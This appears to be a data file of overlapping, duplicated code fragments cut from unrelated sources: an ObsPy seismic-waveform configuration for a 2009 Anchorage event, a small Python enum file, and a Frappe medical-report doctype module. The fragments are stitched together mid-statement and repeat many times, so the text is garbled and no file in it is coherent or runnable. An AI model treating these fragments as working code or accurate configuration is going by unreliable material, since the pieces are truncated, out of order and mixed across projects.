"1 ev_info.icreateNull = 0 #RAW and ENZ files can be used when checking",
"stations with missing components and fill the missing component with a null trace",
"($PYSEP/check_getwaveform.bash) ev_info.isave_raw = False ev_info.isave_raw_processed = False #ev_info.isave_raw = True #ev_info.isave_raw_processed = True",
"#ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 #",
"62 #ev_info.min_lon = -152 #ev_info.max_lon = -147 # default list of Alaska networks",
"# YV MOOS 2006 # XV FLATS 2014 # <NAME> 2015 # XG",
"to exclude the mid-band AV network # note 3: these are temporary: #",
"100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor",
"AV network # note 3: these are temporary: # XE BEAAR 1999 #",
"MOOS 2006 # XV FLATS 2014 # <NAME> 2015 # XG WVF 2016",
"#Be sure to set the null component to 0 in the weight file",
"2015 # XG WVF 2016 # [7C MMEP 2015] # TA #ev_info.network =",
"# ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100",
"ev_info.min_dist = 0 ev_info.max_dist = 300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output",
"a null trace (MPEN) #Be sure to set the null component to 0",
"with a null trace (MPEN) #Be sure to set the null component to",
"2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network",
"#ev_info.network = 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog",
"# =============================================================== # SilwalTape2016 example event (Anchorage) if iex == 0: ev_info.use_catalog =",
"want to exclude the mid-band AV network # note 3: these are temporary:",
"missing components and fill the missing component with a null trace (MPEN) #Be",
"obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window = False",
"2: may want to exclude the mid-band AV network # note 3: these",
"= 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False",
"#ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor =",
"import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage) if iex",
"fill the missing component with a null trace (MPEN) #Be sure to set",
"import obspy import read_event_obspy_file as reof from getwaveform import * def get_ev_info(ev_info,iex): #",
"ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose = True",
"note 2: may want to exclude the mid-band AV network # note 3:",
"= -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor",
"0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat =",
"and fill the missing component with a null trace (MPEN) #Be sure to",
"2016 # [7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK'",
"def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage) if iex == 0:",
"= 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog =",
"#ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel",
"steps ev_info.ifverbose = True #keep stations with missing components and fill the missing",
"FLATS 2014 # <NAME> 2015 # XG WVF 2016 # [7C MMEP 2015]",
"#ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat",
"50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF",
"-149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor =",
"ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec =",
"files can be used when checking if you are receiving all the data",
"# XR ARCTIC 2004 # XZ STEEP 2005 # YV MOOS 2006 #",
"'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60",
"event (Anchorage) if iex == 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist",
"of Alaska networks # note 1: cannot use '*' because of IM #",
"ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag =",
"False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152",
"as reof from getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example",
"300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose =",
"= True #keep stations with missing components and fill the missing component with",
"ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon",
"'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428",
"missing component with a null trace (MPEN) #Be sure to set the null",
"= -152 #ev_info.max_lon = -147 # default list of Alaska networks # note",
"component to 0 in the weight file when running cap #ev_info.icreateNull = 1",
"-149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 #",
"ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon =",
"# TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network =",
"0 #RAW and ENZ files can be used when checking if you are",
"300 #output all proccessing steps ev_info.ifverbose = True #keep stations with missing components",
"#ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon",
"STEEP 2005 # YV MOOS 2006 # XV FLATS 2014 # <NAME> 2015",
"= 100 ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose = True #keep",
"1: cannot use '*' because of IM # note 2: may want to",
"# ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq =",
"default list of Alaska networks # note 1: cannot use '*' because of",
"61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq",
"if iex == 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0",
"WVF 2016 # [7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network =",
"YV MOOS 2006 # XV FLATS 2014 # <NAME> 2015 # XG WVF",
"#ev_info.min_lon = -152 #ev_info.max_lon = -147 # default list of Alaska networks #",
"specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1 #ev_info.outformat = 'DISP'",
"#RAW and ENZ files can be used when checking if you are receiving",
"= 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel =",
"(Anchorage) if iex == 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist =",
"all proccessing steps ev_info.ifverbose = True #keep stations with missing components and fill",
"#keep stations with missing components and fill the missing component with a null"
] |
[
"<reponame>tinmarr/Alien-Fisher-Man from enum import Enum class COL_TYPE(Enum): ELASTIC = 1 STATIC = 2"
] |
[
"\"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if",
"ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung =",
"ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in",
"see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document from",
"ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") #",
"# ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\")",
"# if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\")",
"= patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"]",
"get_deckblat_data(mandat): data = {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt",
"from frappe.model.document import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def",
"data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if",
"for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") #",
"\"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if",
"data = {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt =",
"formatdate class MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage in self.ausgangslage: #",
"in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut =",
"korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data",
"# ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte =",
"# korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung:",
"and contributors # For license information, please see license.txt from __future__ import unicode_literals",
"ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte",
"patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"]",
"mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name",
"import unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data import formatdate class",
"frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \"",
"\"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\",",
"> 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] =",
"\"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for",
"data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee =",
"= '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True)",
"if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = '' return data else: return",
"= korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\")",
"korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung =",
"`tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name",
"ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\",",
"= ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\")",
"data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user),",
"\"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\",",
"len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"]",
"`name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"]",
"employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] =",
"@frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if",
"if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"]",
"FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] =",
"mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] =",
"if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" +",
"# if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\")",
"contributors # For license information, please see license.txt from __future__ import unicode_literals import",
"# For license information, please see license.txt from __future__ import unicode_literals import frappe",
"= '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id`",
"+ \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = ''",
"korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut",
"import frappe from frappe.model.document import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass",
"self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\",",
"# ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut:",
"(c) 2019, libracore and contributors # For license information, please see license.txt from",
"korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") #",
"= ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung",
"\"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\",",
"from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage",
"= ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz:",
"\"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat)",
"\"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if",
"= {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\",",
"mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = '' return data else: return False",
"<gh_stars>0 # -*- coding: utf-8 -*- # Copyright (c) 2019, libracore and contributors",
"please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document",
"if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] =",
"Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def validate(self): # for",
"MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte:",
"korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: #",
"For license information, please see license.txt from __future__ import unicode_literals import frappe from",
"frappe.model.document import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def validate(self):",
"as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if",
"ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\",",
"frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0:",
"validate(self): # for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\",",
"\"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: # if",
"\"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\",",
"if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") #",
"frappe from frappe.model.document import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass #",
"ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: #",
"Copyright (c) 2019, libracore and contributors # For license information, please see license.txt",
"frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage in",
"if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") #",
"def get_deckblat_data(mandat): data = {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt:",
"= '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] =",
"= frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) >",
"ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung =",
"'' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if",
"import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def validate(self): #",
"# korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat:",
"korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat: mandat = frappe.get_doc(\"Mandat\",",
"__future__ import unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data import formatdate",
"self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\",",
"ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") #",
"patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] =",
"korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") #",
"unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document):",
"patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee",
"WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name else:",
"else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = ''",
"from __future__ import unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data import",
"# korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung =",
"# if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\")",
"= korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung",
"`user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"]",
"# if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\")",
"data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else:",
"utf-8 -*- # Copyright (c) 2019, libracore and contributors # For license information,",
"ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte",
"frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum,",
"+ patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = ''",
"in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte =",
"# ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung:",
"ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung",
"data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else:",
"= korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\")",
"ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: #",
"-*- # Copyright (c) 2019, libracore and contributors # For license information, please",
"{} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt)",
"= ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut",
"data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = '' return",
"# for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\")",
"\"\") # for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\",",
"# for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\")",
"# korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\")",
"= frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] =",
"ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: #",
